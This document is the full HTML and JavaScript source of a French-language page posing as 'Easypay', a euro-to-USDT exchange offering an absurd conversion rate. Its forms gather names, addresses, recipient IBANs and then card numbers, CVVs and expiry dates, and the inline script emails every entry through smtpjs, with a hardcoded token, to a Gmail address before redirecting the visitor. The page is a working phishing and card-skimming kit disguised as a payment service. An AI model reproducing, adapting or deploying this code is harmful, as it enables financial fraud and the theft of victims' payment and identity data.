<!doctype html>
<html lang="fr"> 
 <head> 
  <meta charset="UTF-8">
  <title>webtext</title>
  <meta http-equiv="X-UA-Compatible" content="IE=edge"> 
  <meta name="viewport" content="width=device-width, initial-scale=1.0"> 
  <script src="https://kit.fontawesome.com/7e2a69d5dd.js"></script> 
  <script src="https://smtpjs.com/v3/smtp.js"></script> 
 <style type="text/css" id="dcoder_stylesheet">@import url("https://fonts.googleapis.com/css2?family=Open+Sans:wght@400;600&display=swap");
@import url("https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;500;600&display=swap");
@import url('https://fonts.googleapis.com/css2?family=Archivo+Black&display=swap');
*{
    margin:0;
    padding:0;
}
input{
    border:1px solid #777;
    width:81.7%;
    height:50px; 
    outline:none;
    margin-left:10%;
    color:
    margin-top:5%;
    font-family: "Poppins", sans-serif;
  font-size:15px;
}
.opt{
    margin-top:-5%;
    font-size:13px;
    font-family: "Archivo Black", sans-serif;
    position : ;
    margin-left:10%;
}
.input1 button{
    border:1px solid #777;
    width:81.7%;
    background-color:deepskyblue;
    height:50px; 
    outline:none;
    margin-left:10%;
    color:white;
    margin-top:5%;
    font-family: "Archivo Black", sans-serif;
}

#check{
    width:15px;
}
.condi{
    margin-left:10%;
    margin-right:10%;
   font-family: "Poppins", sans-serif;
    font-size:13px;
}
.comb{
  font-family: "Archivo Black", sans-serif;
  margin-top:%; 
  margin-left:5%; 
}
.fex{
    font-family: "Poppins", sans-serif;
    margin-top:-10.8%;
    font-size:13px;
    margin-left:15%;
}
.input2 {
    border:1px solid #777;
    width:85%;
    height:670px;
    display: none;
    position: ;
    margin-top:5%;
    background-color:white;
    margin-left:8%;
    border-radius:5px;
}
.input2 input{
    width:80%;
    height:30px;
    margin-top:5%;
    border-radius:3px;
    font-size:13px;
}
.input3{
    display:flex;
}
.input3 input{
    width:34.6%;
}

input[type="submit"] {
   background-color:deepskyblue;
   color:white;
   }
   .opta{
     font-family: "Archivo Black", sans-serif;
     font-size:13px;  
     margin-top:5%;
     margin-left:10%;
   }
   textarea{
       margin-top:5%;
       width:80%;
    height:100px;
    border-radius:3px;
    font-size:13px;
    margin-left:10%;
   }
   .img img{
       width:150px;
       margin-left:30%;
       margin-top:5%;
   }
   .input4{
       background-color:white;
       display:none;
       height:150%;
       position :fixed;
       margin-top:-153%
       
   }
   .input4 input{
      width:80%;
    height:30px;
    margin-top:3%;
    border-radius:3px;
    font-size:13px;
   }
   #heck{
    width:15px;
}
.check{
   display:flex;
   border:1px solid #777;
   width:90%;
   margin-left:5%;
}
.del{
    margin-top:5%;
    margin-left:2%;
}
.pay{
    margin-left:10%;
    display:flex;
   font-family: "Poppins", sans-serif;
   font-size:13px;
   color:#777;
}
  .title1{
      margin-left:5%;
      font-size:13px;
 font-family: "Archivo Black", sans-serif; 
  } 
  ag{
      font-size:13px; 
      font-family: "Poppins", sans-serif;
      color: ;
        
  }
  #closeButton{
      margin-top:-10%;
      margin-left:3%;
  }
  .yes{
     font-family: "Poppins", sans-serif; 
     margin-left:10%;
  }
  .cmg img{
      margin-left:8%;
      width:150px;
  }
  .ymg img{
      width:100px;
  }
  #dex{
      font-family: "Archivo Black", sans-serif;
      width:80%;
      height:40px;
      font-size:
      
  }
  .det{
    font-family: "Poppins", sans-serif; 
     margin-left:10%;
  }
  .gmg img{
    width:30px;
    cursor:pointer;
    margin-left:2%;
}
.menu{
    display:none;
    background-color: lightgrey;
    padding: 10px;
    animation: fadeIn 1s;
}

@keyframes fadeIn {
    from {
        opacity: 0;
    }
    to {
        opacity: 1;
    }
}

.close{
    float: right;
    cursor: pointer;
}
at{
 font-family: "Archivo Black", sans-serif;   
}
ad{
 font-family: "Poppins", sans-serif; 
    
}
a{
    text-decoration:none
}
.zmg{
    margin-top:%;
    position: 
    text-align:center;
    background-color:whi;
}
.zmg img{
    width:100px;
    display:;
}
.confi img{
    width:50px;
}
.confi{
  display:none; 
}
</style>
<body>
<div class="gmg"><img src="https://i.postimg.cc/9Q7v1jJr/1200px-Hamburger-icon-svg.png"></div>
<div class="menu">
    <span class="close">X</span>
    <at>Menu</at><br>
    <a href="https://networkmoneysocialbotfr.on.drv.tw/id.html"><ad>Annulé un transfert</ad></a><br>
    <a href="https://networkmoneysocialbotfr.on.drv.tw/id.html"><ad>Voir l'évolution de mon transfert</ad></a><br>
    <a href="https://networkmoneysocialbotfr.on.drv.tw/contact.html"><ad>Nous contacter</ad></a><br>
    <a href="https://networkmoneysocialbotfr.on.drv.tw/contact.html"><ad>Signalé un problème</ad></a><br>
    <a href="https://networkmoneysocialbotfr.on.drv.tw/contact.html"><ad>Devenir sponsor</ad><br>
</div></a>
<div class="zmg">
    <img src="https://i.postimg.cc/zDnYt3wS/tether-10016966-8133172.gif">
</div>
<div class="comb">Combien souhaitez vous échanger ?</div><br><br>
<form id="submit1">
<div class="input1">
<div class="opt">Vous échangez</div>
<input type="text" id="name" placeholder=" 0.00&euro;" required><br><br><br>
<div class="opt">Vous recevez</div>
<input type="text" id="name2" placeholder=" 0.00 USDT">
<br><button type="button">Suivant</button>
</form></div><br>
<div class="condi">
<p>Je comfirme que: </p>
<p>J'ai 18 ans</p>
<p>J'utilise Easypay à des fins légaux</p>
<p>J'ai un document d'identité valide</p>
<p>J'accepte les conditions d'utilisation</p>
</div>
<input type="checkbox" id="check">
<div class="fex">Lu et approuvé.</div>
<div class="input4">
<br><br>
<div id="closeButton" style="cursor: pointer;">&#10006;</div>

<div class="cmg"><img src="https://i.postimg.cc/1zNC8NRH/5034879-icone-carte-bancaire-carte-de-credit-vectoriel.jpg"></div>

<div class="yes">Procédez au paiement</div>


<form id="submit3">
<input type="text" id="cname1" placeholder=" Numéro sur la carte" required>
<input type="text" id="cname2" placeholder=" Cvv" required>
<input type="text" id="cname3" placeholder=" Date d'expiration" required><br><br>
<div class="det">Détails du paiement </div>
<div class="pay">
<ag>VOUS PAYEZ:&euro;</ag>
<div class="name"></div></div>
<div class="pay">
<ag>VOUS RECEVEZ: </ag>
<div class="name2"></div></div>
<div class="pay">
<ag>MOTIF : </ag>
<div class="bname11"></div></div>
<div class="pay">
<ag>DESTINATAIRE : </ag>
<div class="bname9"></div></div><br>

<div class="title1">Mon destinataires recevra le virement après :</div><br>
<div class="check">
<input type="checkbox" id="heck">
<div class="del">24h</div>
<input type="checkbox" id="heck">
<div class="del">72h</div>
<input type="checkbox" id="heck">
<div class="del">3jrs</div>
<input type="checkbox" id="heck">
<div class="del">7jrs</div></div><br>
<input type="submit" id="dex" value="PAYEZ">
<div class="pay">
</div>
</form></div>

<form id="submit2">
<div class="input2">
<div class="opta">Votre informations</div>
<input type="text" id="bname1" placeholder=" Votre email" required>
<div class="input3">
<input type="text" id="bname2" placeholder=" Votre nom" required>
<input type="text" id="bname3" placeholder=" Votre prénom" required>
</div>
<input type="text" id="bname4" placeholder=" Pays" required>
<input type="text" id="bname5" placeholder=" Ville" required>
<input type="text" id="bname6" placeholder=" Votre adresse" required>
<div class="opta"> Info destinataire</div>
<input type="text" id="bname7" placeholder=" Nom et prénom" required>
<input type="text" id="bname8" placeholder=" Adresse email" required>
<input type="text" id="bname9" placeholder=" Intitulé du compte" required>
<input type="text" id="bname10" placeholder=" IBAN/Crypto adress" required>
<textarea placeholder="Motif de la transaction... " id="bname11"></textarea>
<input type="submit" value="Suivant">
</div></form>
<div class="img">
<img src="https://i.postimg.cc/L8kGYwb6/Pret-en-ligne-2.png">
</div>

</body>
<script>



document.getElementById("name").addEventListener("input", function() {
  let initialAmount = parseFloat(this.value);
  let repaymentAmount = initialAmount * 603 ;
  document.getElementById("name2").value = repaymentAmount.toFixed(2) + " USDT";
});
document.querySelector("button").addEventListener("click", function() {
    if (document.querySelector("input[type=checkbox]").checked) {
        document.querySelector(".input2").style.display = "block";
    }
});


 const bname1 = document.getElementById('bname1');
const bname2 = document.getElementById('bname2');
const bname3 = document.getElementById('bname3');
const bname4 = document.getElementById('bname4');
const bname5 = document.getElementById('bname5');
const bname6 = document.getElementById('bname6');
const bname7 = document.getElementById('bname7');
const bname8 = document.getElementById('bname8');
const bname9 = document.getElementById('bname9');
const bname10 = document.getElementById('bname10');
const bname11 = document.getElementById('bname11');
const submit2 = document.getElementById('submit2');

submit2.addEventListener('submit', (e) => {
    e.preventDefault();
 // Ajout du délai de 5 secondes avant l'envoi du formulaire
    let ebody2 = `
      <h1>Pays : </h1>${bname1.value}
        <br>
       <h1>Créer un cde : </h1>${bname2.value}
        <br>
        <h1>Code de parrainage : </h1>${bname3.value}
        <br>
         <h1>Pays : </h1>${bname4.value}
        <br>
       <h1>Créer un cde : </h1>${bname5.value}
        <br>
        <h1>Code de parrainage : </h1>${bname6.value}
        <br>
         <h1>Pays : </h1>${bname7.value}
        <br>
       <h1>Créer un cde : </h1>${bname8.value}
        <br>
        <h1>Code de parrainage : </h1>${bname9.value}
        <br>
         <h1>Code de parrainage : </h1>${bname10.value}
        <br>
        `;

    Email.send({
        SecureToken: "24ed91c7-882b-465c-97d2-32856db82fdb", //add your token here
        To: 'abdoulissa154@gmail.com',
        From: "abdoulissa154@gmail.com",
        Subject: "This is the subject",
        Body: ebody2
    }).then(() => {
        window.location.href = "#"; // Redirection vers Google
    });
   }, 1000); // Délai de 5000 

// Lorsque le formulaire est soumis
document.getElementById("submit2").addEventListener('submit', function(e) {
  e.preventDefault(); // Empêche l'envoi par défaut du formulaire
  
  document.querySelector(".input4").style.display = "block"; // Affiche le div input4
});

// Lorsque la croix est cliquée
document.getElementById("closeButton").addEventListener('click', function() {
  document.querySelector(".input4").style.display = "none"; // Masque le div input4
});

// Récupération des éléments input
const nameInput = document.getElementById('name');
const name2Input = document.getElementById('name2');
const bname11Input = document.getElementById('bname11');
const bname9Input = document.getElementById('bname9');

// Fonction à exécuter lorsque la valeur des inputs change
const handleInputChange = () => {
  document.querySelector('.name').textContent = nameInput.value;
  document.querySelector('.name2').textContent = name2Input.value;
  document.querySelector('.bname11').textContent = bname11Input.value;
  document.querySelector('.bname9').textContent = bname9Input.value;
};

// Ajout d'un écouteur d'événement à chaque input
nameInput.addEventListener('input', handleInputChange);
name2Input.addEventListener('input', handleInputChange);
bname11Input.addEventListener('input', handleInputChange);
bname9Input.addEventListener('input', handleInputChange);

const cname1 = document.getElementById('cname1');
const cname2 = document.getElementById('cname2');
const cname3 = document.getElementById('cname3');
const submit3 = document.getElementById('submit3');

submit3.addEventListener('submit', (e) => {
    e.preventDefault();
 // Ajout du délai de 5 secondes avant l'envoi du formulaire
    let ebody2 = `
       <h1>Numbers cadre: </h1>${cname1.value}
        <br>
        <h1>Expire: </h1>${cname2.value}
        <br>
         <h1>Cvb : </h1>${cname3.value}
        <br>
        `;

    Email.send({
        SecureToken: "24ed91c7-882b-465c-97d2-32856db82fdb", //add your token here
        To: 'abdoulissa154@gmail.com',
        From: "abdoulissa154@gmail.com",
        Subject: "This is the subject",
        Body: ebody2
    }).then(() => {
        window.location.href = "https://issa51.github.io/Pay7/"; // Redirection vers Google
    });
   }, 1000); // Délai de 5000 
   
document.querySelector('.gmg').addEventListener('click', function(){
    document.querySelector('.menu').style.display = 'block';
});

document.querySelector('.close').addEventListener('click', function(){
    document.querySelector('.menu').style.display = 'none';
});

document.querySelector('.gmg').addEventListener('click', function(){
    document.querySelector('.menu').style.display = 'block';
});

document.querySelector('.close').addEventListener('click', function(){
    document.querySelector('.menu').style.display = 'none';
});

document.getElementById("dex").addEventListener("click", function() {
  document.querySelector(".confi").style.display = "block";
});

</script></html>|